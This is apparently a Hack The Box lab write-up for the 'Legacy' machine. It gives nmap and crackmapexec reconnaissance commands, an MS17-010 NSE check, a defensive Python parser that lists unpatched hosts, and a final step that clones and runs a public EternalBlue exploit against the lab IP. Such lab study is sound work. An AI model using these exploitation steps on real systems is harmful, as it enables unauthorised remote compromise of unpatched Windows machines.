Legacy - Hack The Box
Reconnaissance
- Nmap
nmap -sS --open -p- --min-rate 5000 -vvv -n -Pn 10.10.10.4
- Vulnerability and version scan
nmap -sCV -p135,139,445 -vvv 10.10.10.4
- Try to connect to SMB with crackmapexec (guest user, empty password)
crackmapexec smb 10.10.10.4 -u guest -p ''
The host is probably vulnerable to EternalBlue (MS17-010)
- Confirm MS17-010 with the Nmap NSE script
nmap -p445 --script smb-vuln-ms17-010 10.10.10.4
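The NSE check above can be run across a subnet with -oX to get XML output; the following added script (not part of the original notes) parses that XML and reports, per host, the state the smb-vuln-ms17-010 script recorded, so the hosts still missing the MS17-010 patch can be listed for remediation. The embedded XML is a constructed sample, not a real scan capture.

```python
import xml.etree.ElementTree as ET

# Constructed sample of nmap -oX output for the MS17-010 NSE check (not a real capture).
# Host 10.10.10.4 gets a VULNERABLE verdict; the second host ran the script with no verdict.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun>
  <host>
    <address addr="10.10.10.4" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="open"/></port></ports>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="VULNERABLE: ...">
        <table key="CVE-2017-0143">
          <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
          <elem key="state">VULNERABLE</elem>
        </table>
      </script>
    </hostscript>
  </host>
  <host>
    <address addr="10.10.10.5" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="open"/></port></ports>
    <hostscript><script id="smb-vuln-ms17-010" output="Could not connect to named pipe"/></hostscript>
  </host>
</nmaprun>
"""


def ms17_010_state(xml_text):
    """Return {ip: state} for every host on which smb-vuln-ms17-010 ran.

    state is the vulns-library verdict ("VULNERABLE", "NOT VULNERABLE", ...),
    or "UNKNOWN" when the script produced no <elem key="state"> at all.
    """
    results = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        # iter() covers both <hostscript> and per-port <script> placements.
        for script in host.iter("script"):
            if script.get("id") != "smb-vuln-ms17-010":
                continue
            state = "UNKNOWN"
            for elem in script.iter("elem"):
                if elem.get("key") == "state" and elem.text:
                    state = elem.text.strip()
            results[addr.get("addr")] = state
    return results


def vulnerable_hosts(xml_text):
    """Sorted list of IPs whose verdict is exactly VULNERABLE (the patch-now list)."""
    return sorted(ip for ip, st in ms17_010_state(xml_text).items() if st == "VULNERABLE")


if __name__ == "__main__":
    for ip, state in ms17_010_state(SAMPLE_XML).items():
        print(f"{ip}: {state}")
```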
Exploitation
- EternalBlue MS17-010 (CVE-2017-0143)
git clone https://github.com/n3rdh4x0r/MS17-010.git
cd MS17-010
python3 exploit.py 10.10.10.4